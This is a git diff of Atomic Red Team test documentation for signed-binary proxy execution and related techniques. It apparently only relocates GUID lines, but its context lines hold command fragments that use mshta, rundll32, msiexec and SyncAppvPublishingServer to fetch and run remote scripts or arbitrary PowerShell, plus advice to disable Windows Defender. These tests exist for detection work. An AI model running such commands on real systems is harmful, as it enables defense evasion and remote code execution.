## Atomic Test #7 - Invoke CHM Shortcut Command with ITS and Help Topic - -auto_generated_guid: 15756147-7470-4a83-87fb-bb5662526247 - Executes a CHM file using the Shortcut Command method with a defined ITS Protocol Handler, and help topic extension. + **Supported Platforms:** Windows +**auto_generated_guid:** 15756147-7470-4a83-87fb-bb5662526247 + + + #### Inputs: diff --git a/atomics/T1218.002/T1218.002.md b/atomics/T1218.002/T1218.002.md index 831bf542..95b2ed09 100644 --- a/atomics/T1218.002/T1218.002.md +++ b/atomics/T1218.002/T1218.002.md @@ -16,14 +16,16 @@ Adversaries may also rename malicious DLL files (.dll) with Control Panel file e
## Atomic Test #1 - Control Panel Items - -auto_generated_guid: 037e9d8a-9e46-4255-8b33-2ae3b545ca6f - This test simulates an adversary leveraging control.exe Upon execution calc.exe will be launched + **Supported Platforms:** Windows +**auto_generated_guid:** 037e9d8a-9e46-4255-8b33-2ae3b545ca6f + + + #### Inputs: diff --git a/atomics/T1218.003/T1218.003.md b/atomics/T1218.003/T1218.003.md index 4cd4cfd9..57adcbec 100644 --- a/atomics/T1218.003/T1218.003.md +++ b/atomics/T1218.003/T1218.003.md @@ -16,13 +16,15 @@ CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mit
## Atomic Test #1 - CMSTP Executing Remote Scriptlet - -auto_generated_guid: 34e63321-9683-496b-bbc1-7566bc55e624 - Adversaries may supply CMSTP.exe with INF files infected with malicious commands + **Supported Platforms:** Windows +**auto_generated_guid:** 34e63321-9683-496b-bbc1-7566bc55e624 + + + #### Inputs: @@ -60,13 +62,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - CMSTP Executing UAC Bypass - -auto_generated_guid: 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 - Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file + **Supported Platforms:** Windows +**auto_generated_guid:** 748cb4f6-2fb3-4e97-b7ad-b22635a09ab0 + + + #### Inputs: diff --git a/atomics/T1218.004/T1218.004.md b/atomics/T1218.004/T1218.004.md index d30c0256..52a9a6bb 100644 --- a/atomics/T1218.004/T1218.004.md +++ b/atomics/T1218.004/T1218.004.md @@ -26,14 +26,16 @@ InstallUtil may also be used to bypass application control through use of attrib
## Atomic Test #1 - CheckIfInstallable method call - -auto_generated_guid: ffd9c807-d402-47d2-879d-f915cf2a3a94 - Executes the CheckIfInstallable class constructor runner instead of executing InstallUtil. Upon execution, the InstallUtil test harness will be executed. If no output is displayed the test executed successfuly. + **Supported Platforms:** Windows +**auto_generated_guid:** ffd9c807-d402-47d2-879d-f915cf2a3a94 + + + #### Inputs: @@ -104,14 +106,16 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - InstallHelper method call - -auto_generated_guid: d43a5bde-ae28-4c55-a850-3f4c80573503 - Executes the InstallHelper class constructor runner instead of executing InstallUtil. Upon execution, no output will be displayed if the test executed successfuly. + **Supported Platforms:** Windows +**auto_generated_guid:** d43a5bde-ae28-4c55-a850-3f4c80573503 + + + #### Inputs: @@ -184,13 +188,15 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #3 - InstallUtil class constructor method call - -auto_generated_guid: 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 - Executes the installer assembly class constructor. Upon execution, version information will be displayed the .NET framework install utility. + **Supported Platforms:** Windows +**auto_generated_guid:** 9b7a7cfc-dd2e-43f5-a885-c0a3c270dd93 + + + #### Inputs: @@ -263,13 +269,15 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - InstallUtil Install method call - -auto_generated_guid: 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b - Executes the Install Method. Upon execution, version information will be displayed the .NET framework install utility. + **Supported Platforms:** Windows +**auto_generated_guid:** 9f9968a6-601a-46ca-b7b7-6d4fe0f98f0b + + + #### Inputs: @@ -342,13 +350,15 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - InstallUtil Uninstall method call - /U variant - -auto_generated_guid: 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b - Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. + **Supported Platforms:** Windows +**auto_generated_guid:** 34428cfa-8e38-41e5-aff4-9e1f8f3a7b4b + + + #### Inputs: @@ -421,13 +431,15 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #6 - InstallUtil Uninstall method call - '/installtype=notransaction /action=uninstall' variant - -auto_generated_guid: 06d9deba-f732-48a8-af8e-bdd6e4d98c1d - Executes the Uninstall Method. Upon execution, version information will be displayed the .NET framework install utility. + **Supported Platforms:** Windows +**auto_generated_guid:** 06d9deba-f732-48a8-af8e-bdd6e4d98c1d + + + #### Inputs: @@ -500,13 +512,15 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #7 - InstallUtil HelpText method call - -auto_generated_guid: 5a683850-1145-4326-a0e5-e91ced3c6022 - Executes the Uninstall Method. Upon execution, help information will be displayed for InstallUtil. + **Supported Platforms:** Windows +**auto_generated_guid:** 5a683850-1145-4326-a0e5-e91ced3c6022 + + + #### Inputs: @@ -579,14 +593,16 @@ Invoke-WebRequest 'https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #8 - InstallUtil evasive invocation - -auto_generated_guid: 559e6d06-bb42-4307-bff7-3b95a8254bad - Executes an InstallUtil assembly by renaming InstallUtil.exe and using a nonstandard extension for the assembly. Upon execution, "Running a transacted installation." will be displayed, along with other information about the opperation. "The transacted install has completed." will be displayed upon completion. + **Supported Platforms:** Windows +**auto_generated_guid:** 559e6d06-bb42-4307-bff7-3b95a8254bad + + + #### Inputs: diff --git a/atomics/T1218.005/T1218.005.md b/atomics/T1218.005/T1218.005.md index 420c1301..8682f1e1 100644 --- a/atomics/T1218.005/T1218.005.md +++ b/atomics/T1218.005/T1218.005.md @@ -34,13 +34,15 @@ Mshta.exe can be used to bypass application control solutions that do not accoun
## Atomic Test #1 - Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject - -auto_generated_guid: 1483fab9-4f52-4217-a9ce-daa9d7747cae - Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** 1483fab9-4f52-4217-a9ce-daa9d7747cae + + + #### Inputs: @@ -65,15 +67,17 @@ mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();
## Atomic Test #2 - Mshta executes VBScript to execute malicious command - -auto_generated_guid: 906865c3-e05f-4acc-85c4-fbc185455095 - Run a local VB script to run local user enumeration powershell command. This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems. Upon execution, a new PowerShell windows will be opened that displays user information. + **Supported Platforms:** Windows +**auto_generated_guid:** 906865c3-e05f-4acc-85c4-fbc185455095 + + + @@ -93,13 +97,15 @@ mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell -noexit
## Atomic Test #3 - Mshta Executes Remote HTML Application (HTA) - -auto_generated_guid: c4b97eeb-5249-4455-a607-59f95485cb45 - Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** c4b97eeb-5249-4455-a607-59f95485cb45 + + + #### Inputs: @@ -131,13 +137,15 @@ remove-item "#{temp_file}" -ErrorAction Ignore
## Atomic Test #4 - Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement - -auto_generated_guid: 007e5672-2088-4853-a562-7490ddc19447 - Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement. + **Supported Platforms:** Windows +**auto_generated_guid:** 007e5672-2088-4853-a562-7490ddc19447 + + + #### Inputs: @@ -178,13 +186,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #5 - Invoke HTML Application - Jscript Engine Simulating Double Click - -auto_generated_guid: 58a193ec-131b-404e-b1ca-b35cf0b18c33 - Executes an HTA Application using JScript script engine simulating double click. + **Supported Platforms:** Windows +**auto_generated_guid:** 58a193ec-131b-404e-b1ca-b35cf0b18c33 + + + #### Inputs: @@ -224,13 +234,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #6 - Invoke HTML Application - Direct download from URI - -auto_generated_guid: 39ceed55-f653-48ac-bd19-aceceaf525db - Executes an HTA Application by directly downloading from remote URI. + **Supported Platforms:** Windows +**auto_generated_guid:** 39ceed55-f653-48ac-bd19-aceceaf525db + + + #### Inputs: @@ -270,13 +282,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #7 - Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler - -auto_generated_guid: e7e3a525-7612-4d68-a5d3-c4649181b8af - Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler. + **Supported Platforms:** Windows +**auto_generated_guid:** e7e3a525-7612-4d68-a5d3-c4649181b8af + + + #### Inputs: @@ -317,13 +331,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #8 - Invoke HTML Application - JScript Engine with Inline Protocol Handler - -auto_generated_guid: d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 - Executes an HTA Application with JScript Engine and Inline Protocol Handler. + **Supported Platforms:** Windows +**auto_generated_guid:** d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840 + + + #### Inputs: @@ -364,13 +380,15 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
## Atomic Test #9 - Invoke HTML Application - Simulate Lateral Movement over UNC Path - -auto_generated_guid: b8a8bdb2-7eae-490d-8251-d5e0295b2362 - Executes an HTA Application with Simulate lateral movement over UNC Path. + **Supported Platforms:** Windows +**auto_generated_guid:** b8a8bdb2-7eae-490d-8251-d5e0295b2362 + + + #### Inputs: diff --git a/atomics/T1218.007/T1218.007.md b/atomics/T1218.007/T1218.007.md index e6629801..6af04be4 100644 --- a/atomics/T1218.007/T1218.007.md +++ b/atomics/T1218.007/T1218.007.md @@ -16,13 +16,15 @@ Adversaries may abuse msiexec.exe to launch local or network accessible MSI file
## Atomic Test #1 - Msiexec.exe - Execute Local MSI file - -auto_generated_guid: 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8 - Execute arbitrary MSI file. Commonly seen in application installation. The MSI opens notepad.exe when sucessfully executed. + **Supported Platforms:** Windows +**auto_generated_guid:** 0683e8f7-a27b-4b62-b7ab-dc7d4fed1df8 + + + #### Inputs: @@ -59,13 +61,15 @@ Write-Host "You must provide your own MSI"
## Atomic Test #2 - Msiexec.exe - Execute Remote MSI file - -auto_generated_guid: bde7d2fe-d049-458d-a362-abda32a7e649 - Execute arbitrary MSI file retrieved remotely. Less commonly seen in application installation, commonly seen in malware execution. The MSI opens notepad.exe when sucessfully executed. + **Supported Platforms:** Windows +**auto_generated_guid:** bde7d2fe-d049-458d-a362-abda32a7e649 + + + #### Inputs: @@ -90,15 +94,17 @@ msiexec.exe /q /i "#{msi_payload}"
## Atomic Test #3 - Msiexec.exe - Execute Arbitrary DLL - -auto_generated_guid: 66f64bd5-7c35-4c24-953a-04ca30a0a0ec - Execute arbitrary DLL file stored locally. Commonly seen in application installation. Upon execution, a window titled "Boom!" will open that says "Locked and Loaded!". For 32 bit systems change the dll_payload argument to the Win32 folder. By default, if the src folder is not in place, it will download the 64 bit version. + **Supported Platforms:** Windows +**auto_generated_guid:** 66f64bd5-7c35-4c24-953a-04ca30a0a0ec + + + #### Inputs: diff --git a/atomics/T1218.008/T1218.008.md b/atomics/T1218.008/T1218.008.md index a05669ab..4f5b72e6 100644 --- a/atomics/T1218.008/T1218.008.md +++ b/atomics/T1218.008/T1218.008.md @@ -13,13 +13,15 @@ Adversaries may abuse odbcconf.exe to bypass application control solutions that
## Atomic Test #1 - Odbcconf.exe - Execute Arbitrary DLL - -auto_generated_guid: 2430498b-06c0-4b92-a448-8ad263c388e2 - Execute arbitrary DLL file stored locally. + **Supported Platforms:** Windows +**auto_generated_guid:** 2430498b-06c0-4b92-a448-8ad263c388e2 + + + #### Inputs: diff --git a/atomics/T1218.009/T1218.009.md b/atomics/T1218.009/T1218.009.md index 14171284..d2b8d2e2 100644 --- a/atomics/T1218.009/T1218.009.md +++ b/atomics/T1218.009/T1218.009.md @@ -14,13 +14,15 @@ Both utilities may be used to bypass application control through use of attribut
## Atomic Test #1 - Regasm Uninstall Method Call Test - -auto_generated_guid: 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 - Executes the Uninstall Method, No Admin Rights Required. Upon execution, "I shouldn't really execute either." will be displayed. + **Supported Platforms:** Windows +**auto_generated_guid:** 71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112 + + + #### Inputs: @@ -64,14 +66,16 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Regsvcs Uninstall Method Call Test - -auto_generated_guid: fd3c1c6a-02d2-4b72-82d9-71c527abb126 - Executes the Uninstall Method, No Admin Rights Required, Requires SNK. Upon execution, "I shouldn't really execute" will be displayed along with other information about the assembly being installed. + **Supported Platforms:** Windows +**auto_generated_guid:** fd3c1c6a-02d2-4b72-82d9-71c527abb126 + + + #### Inputs: diff --git a/atomics/T1218.010/T1218.010.md b/atomics/T1218.010/T1218.010.md index e63f0519..b2a345a8 100644 --- a/atomics/T1218.010/T1218.010.md +++ b/atomics/T1218.010/T1218.010.md @@ -22,13 +22,15 @@ Regsvr32.exe can also be leveraged to register a COM Object used to establish pe
## Atomic Test #1 - Regsvr32 local COM scriptlet execution - -auto_generated_guid: 449aa403-6aba-47ce-8a37-247d21ef0306 - Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** 449aa403-6aba-47ce-8a37-247d21ef0306 + + + #### Inputs: @@ -68,14 +70,16 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - Regsvr32 remote COM scriptlet execution - -auto_generated_guid: c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 - Regsvr32.exe is a command-line program used to register and unregister OLE controls. This test may be blocked by windows defender; disable windows defender real-time protection to fix it. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36 + + + #### Inputs: @@ -102,13 +106,15 @@ windows defender real-time protection to fix it. Upon execution, calc.exe will b
## Atomic Test #3 - Regsvr32 local DLL execution - -auto_generated_guid: 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b - Regsvr32.exe is a command-line program used to register and unregister OLE controls. Upon execution, calc.exe will be launched. + **Supported Platforms:** Windows +**auto_generated_guid:** 08ffca73-9a3d-471a-aeb0-68b4aa3ab37b + + + #### Inputs: @@ -148,13 +154,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - Regsvr32 Registering Non DLL - -auto_generated_guid: 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 - Replicating observed Gozi maldoc behavior registering a dll with an altered extension + **Supported Platforms:** Windows +**auto_generated_guid:** 1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421 + + + #### Inputs: @@ -197,13 +205,15 @@ copy "C:\Windows\System32\shell32.dll" "#{dll_file}"
## Atomic Test #5 - Regsvr32 Silent DLL Install Call DllRegisterServer - -auto_generated_guid: 9d71c492-ea2e-4c08-af16-c6994cdf029f - Regsvr32.exe is a command-line program used to register and unregister OLE controls. Normally, an install is executed with /n to prevent calling DllRegisterServer. + **Supported Platforms:** Windows +**auto_generated_guid:** 9d71c492-ea2e-4c08-af16-c6994cdf029f + + + #### Inputs: diff --git a/atomics/T1218.011/T1218.011.md b/atomics/T1218.011/T1218.011.md index 9af355b7..ce2c66cb 100644 --- a/atomics/T1218.011/T1218.011.md +++ b/atomics/T1218.011/T1218.011.md @@ -28,13 +28,15 @@ Rundll32 can also be used to execute scripts such as JavaScript. This can be don
## Atomic Test #1 - Rundll32 execute JavaScript Remote Payload With GetObject - -auto_generated_guid: cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be - Test execution of a remote script using rundll32.exe. Upon execution notepad.exe will be opened. + **Supported Platforms:** Windows +**auto_generated_guid:** cf3bdb9a-dd11-4b6c-b0d0-9e22b68a71be + + + #### Inputs: @@ -59,15 +61,17 @@ rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObj
## Atomic Test #2 - Rundll32 execute VBscript command - -auto_generated_guid: 638730e7-7aed-43dc-bf8c-8117f805f5bb - Test execution of a command using rundll32.exe and VBscript in a similar manner to the JavaScript test. Technique documented by Hexacorn- http://www.hexacorn.com/blog/2019/10/29/rundll32-with-a-vbscript-protocol/ Upon execution calc.exe will be launched + **Supported Platforms:** Windows +**auto_generated_guid:** 638730e7-7aed-43dc-bf8c-8117f805f5bb + + + #### Inputs: @@ -92,15 +96,17 @@ rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.
## Atomic Test #3 - Rundll32 advpack.dll Execution - -auto_generated_guid: d91cae26-7fc1-457b-a854-34c8aad48c89 - Test execution of a command using rundll32.exe with advpack.dll. Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Advpack.yml Upon execution calc.exe will be launched + **Supported Platforms:** Windows +**auto_generated_guid:** d91cae26-7fc1-457b-a854-34c8aad48c89 + + + #### Inputs: @@ -138,16 +144,18 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - Rundll32 ieadvpack.dll Execution - -auto_generated_guid: 5e46a58e-cbf6-45ef-a289-ed7754603df9 - Test execution of a command using rundll32.exe with ieadvpack.dll. Upon execution calc.exe will be launched Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Ieadvpack.yml + **Supported Platforms:** Windows +**auto_generated_guid:** 5e46a58e-cbf6-45ef-a289-ed7754603df9 + + + #### Inputs: @@ -185,15 +193,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - Rundll32 syssetup.dll Execution - -auto_generated_guid: 41fa324a-3946-401e-bbdd-d7991c628125 - Test execution of a command using rundll32.exe with syssetup.dll. Upon execution, a window saying "installation failed" will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Syssetup.yml + **Supported Platforms:** Windows +**auto_generated_guid:** 41fa324a-3946-401e-bbdd-d7991c628125 + + + #### Inputs: @@ -231,15 +241,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #6 - Rundll32 setupapi.dll Execution - -auto_generated_guid: 71d771cd-d6b3-4f34-bc76-a63d47a10b19 - Test execution of a command using rundll32.exe with setupapi.dll. Upon execution, a windows saying "installation failed" will be opened Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSLibraries/Setupapi.yml + **Supported Platforms:** Windows +**auto_generated_guid:** 71d771cd-d6b3-4f34-bc76-a63d47a10b19 + + + #### Inputs: @@ -277,18 +289,20 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #7 - Execution of HTA and VBS Files using Rundll32 and URL.dll - -auto_generated_guid: 22cfde89-befe-4e15-9753-47306b37a6e3 - IcedID uses this TTP as follows: rundll32.exe url.dll,OpenURL %PUBLIC%\index.hta Trickbot uses this TTP as follows: rundll32.exe URL.dll,FileProtocolHandler C:\\..\\Detail\\akteullen.vbs In this atomic, the sample hta file opens the calculator and the vbs file shows a message dialog with "rundll32 spawned wscript" + **Supported Platforms:** Windows +**auto_generated_guid:** 22cfde89-befe-4e15-9753-47306b37a6e3 + + + @@ -309,13 +323,15 @@ rundll32.exe URL.dll,FileProtocolHandler PathToAtomicsFolder\T1218.011\src\akteu
## Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll - -auto_generated_guid: 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 - Executes the LaunchApplication function in pcwutl.dll to proxy execution of an executable. + **Supported Platforms:** Windows +**auto_generated_guid:** 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 + + + #### Inputs: diff --git a/atomics/T1218/T1218.md b/atomics/T1218/T1218.md index cc3c2998..49ffa97d 100644 --- a/atomics/T1218/T1218.md +++ b/atomics/T1218/T1218.md @@ -24,13 +24,15 @@
## Atomic Test #1 - mavinject - Inject DLL into running process - -auto_generated_guid: c426dacf-575d-4937-8611-a148a86a5e61 - Injects arbitrary DLL into running process specified by process ID. Requires Windows 10. + **Supported Platforms:** Windows +**auto_generated_guid:** c426dacf-575d-4937-8611-a148a86a5e61 + + + #### Inputs: @@ -69,13 +71,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - SyncAppvPublishingServer - Execute arbitrary PowerShell code - -auto_generated_guid: d590097e-d402-44e2-ad72-2c6aa1ce78b1 - Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. Requires Windows 10. + **Supported Platforms:** Windows +**auto_generated_guid:** d590097e-d402-44e2-ad72-2c6aa1ce78b1 + + + #### Inputs: @@ -100,13 +104,15 @@ SyncAppvPublishingServer.exe "n; #{powershell_code}"
## Atomic Test #3 - Register-CimProvider - Execute evil dll - -auto_generated_guid: ad2c17ed-f626-4061-b21e-b9804a6f3655 - Execute arbitrary dll. Requires at least Windows 8/2012. Also note this dll can be served up via SMB + **Supported Platforms:** Windows +**auto_generated_guid:** ad2c17ed-f626-4061-b21e-b9804a6f3655 + + + #### Inputs: @@ -144,15 +150,17 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - InfDefaultInstall.exe .inf Execution - -auto_generated_guid: 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef - Test execution of a .inf using InfDefaultInstall.exe Reference: https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/OSBinaries/Infdefaultinstall.yml + **Supported Platforms:** Windows +**auto_generated_guid:** 54ad7d5a-a1b5-472c-b6c4-f8090fb2daef + + + #### Inputs: @@ -190,13 +198,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #5 - ProtocolHandler.exe Downloaded a Suspicious File - -auto_generated_guid: db020456-125b-4c8b-a4a7-487df8afb5a2 - Emulates attack via documents through protocol handler in Microsoft Office. On successful execution you should see Microsoft Word launch a blank file. + **Supported Platforms:** Windows +**auto_generated_guid:** db020456-125b-4c8b-a4a7-487df8afb5a2 + + + #### Inputs: @@ -234,13 +244,15 @@ write-host "Install Microsoft Word or provide correct path."
## Atomic Test #6 - Microsoft.Workflow.Compiler.exe Payload Execution - -auto_generated_guid: 7cbb0f26-a4c1-4f77-b180-a009aa05637e - Emulates attack with Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe + **Supported Platforms:** Windows +**auto_generated_guid:** 7cbb0f26-a4c1-4f77-b180-a009aa05637e + + + #### Inputs: @@ -279,13 +291,15 @@ write-host ".Net must be installed for this test to work correctly."
## Atomic Test #7 - Renamed Microsoft.Workflow.Compiler.exe Payload Executions - -auto_generated_guid: 4cc40fd7-87b8-4b16-b2d7-57534b86b911 - Emulates attack with a renamed Microsoft.Workflow.Compiler.exe running a .Net assembly that launches calc.exe + **Supported Platforms:** Windows +**auto_generated_guid:** 4cc40fd7-87b8-4b16-b2d7-57534b86b911 + + + #### Inputs: @@ -326,9 +340,6 @@ write-host "you need to rename workflow complier before you run this test"
## Atomic Test #8 - Invoke-ATHRemoteFXvGPUDisablementCommand base test - -auto_generated_guid: 9ebe7901-7edf-45c0-b5c7-8366300919db - RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339). One of the PowerShell functions called by RemoteFXvGPUDisablement.exe is Get-VMRemoteFXPhysicalVideoAdapter, a part of the Hyper-V module. This atomic test influences RemoteFXvGPUDisablement.exe to execute custom PowerShell code by using a technique referred to as "PowerShell module load-order hijacking" where a module containing, in this case, an implementation of the Get-VMRemoteFXPhysicalVideoAdapter is loaded first by way of introducing a temporary module into the first directory listed in the %PSModulePath% environment variable or within a user-specified module directory outside of %PSModulePath%. Upon execution the temporary module is deleted. @@ -338,9 +349,14 @@ Invoke-ATHRemoteFXvGPUDisablementCommand is used in this test to demonstrate how The Invoke-ATHRemoteFXvGPUDisablementCommand function outputs all relevant execution-related artifacts. Reference: https://github.com/redcanaryco/AtomicTestHarnesses/blob/master/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1 + **Supported Platforms:** Windows +**auto_generated_guid:** 9ebe7901-7edf-45c0-b5c7-8366300919db + + + #### Inputs: diff --git a/atomics/T1219/T1219.md b/atomics/T1219/T1219.md index b22acd43..58c028d8 100644 --- a/atomics/T1219/T1219.md +++ b/atomics/T1219/T1219.md @@ -18,13 +18,15 @@ Admin tools such as TeamViewer have been used by several groups targeting instit
## Atomic Test #1 - TeamViewer Files Detected Test on Windows - -auto_generated_guid: 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 - An adversary may attempt to trick the user into downloading teamviewer and using this to maintain access to the machine. Download of TeamViewer installer will be at the destination location when sucessfully executed. + **Supported Platforms:** Windows +**auto_generated_guid:** 8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0 + + + @@ -54,13 +56,15 @@ Remove-Item $file1 -ErrorAction Ignore | Out-Null
## Atomic Test #2 - AnyDesk Files Detected Test on Windows - -auto_generated_guid: 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 - An adversary may attempt to trick the user into downloading AnyDesk and use to establish C2. Download of AnyDesk installer will be at the destination location and ran when sucessfully executed. + **Supported Platforms:** Windows +**auto_generated_guid:** 6b8b7391-5c0a-4f8c-baee-78d8ce0ce330 + + + @@ -87,13 +91,15 @@ Remove-Item $file1 -ErrorAction Ignore
## Atomic Test #3 - LogMeIn Files Detected Test on Windows - -auto_generated_guid: d03683ec-aae0-42f9-9b4c-534780e0f8e1 - An adversary may attempt to trick the user into downloading LogMeIn and use to establish C2. Download of LogMeIn installer will be at the destination location and ran when sucessfully executed. + **Supported Platforms:** Windows +**auto_generated_guid:** d03683ec-aae0-42f9-9b4c-534780e0f8e1 + + + diff --git a/atomics/T1220/T1220.md b/atomics/T1220/T1220.md index 43a4c44f..c88966ce 100644 --- a/atomics/T1220/T1220.md +++ b/atomics/T1220/T1220.md @@ -31,13 +31,15 @@ Command-line examples:(Citation: XSL Bypass Mar 2019)(Citation: LOLBAS Wmic)
## Atomic Test #1 - MSXSL Bypass using local files - -auto_generated_guid: ca23bfb2-023f-49c5-8802-e66997de462d - Executes the code specified within a XSL script tag during XSL transformation using a local payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. + **Supported Platforms:** Windows +**auto_generated_guid:** ca23bfb2-023f-49c5-8802-e66997de462d + + + #### Inputs: @@ -86,13 +88,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #2 - MSXSL Bypass using remote files - -auto_generated_guid: a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 - Executes the code specified within a XSL script tag during XSL transformation using a remote payload. Requires download of MSXSL from Microsoft at https://www.microsoft.com/en-us/download/details.aspx?id=21714. Open Calculator.exe when test sucessfully executed, while AV turned off. + **Supported Platforms:** Windows +**auto_generated_guid:** a7c3ab07-52fb-49c8-ab6d-e9c6d4a0a985 + + + #### Inputs: @@ -118,13 +122,15 @@ C:\Windows\Temp\msxsl.exe #{xmlfile} #{xslfile}
## Atomic Test #3 - WMIC bypass using local XSL file - -auto_generated_guid: 1b237334-3e21-4a0c-8178-b8c996124988 - Executes the code specified within a XSL script using a local payload. + **Supported Platforms:** Windows +**auto_generated_guid:** 1b237334-3e21-4a0c-8178-b8c996124988 + + + #### Inputs: @@ -163,13 +169,15 @@ Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/ato
## Atomic Test #4 - WMIC bypass using remote XSL file - -auto_generated_guid: 7f5be499-33be-4129-a560-66021f379b9b - Executes the code specified within a XSL script using a remote payload. Open Calculator.exe when test sucessfully executed, while AV turned off. + **Supported Platforms:** Windows +**auto_generated_guid:** 7f5be499-33be-4129-a560-66021f379b9b + + + #### Inputs: diff --git a/atomics/T1221/T1221.md b/atomics/T1221/T1221.md index 3c8a6061..d39205df 100644 --- a/atomics/T1221/T1221.md +++ b/atomics/T1221/T1221.md @@ -16,16 +16,18 @@ This technique may also enable [Forced Authentication](https://attack.mitre.org/
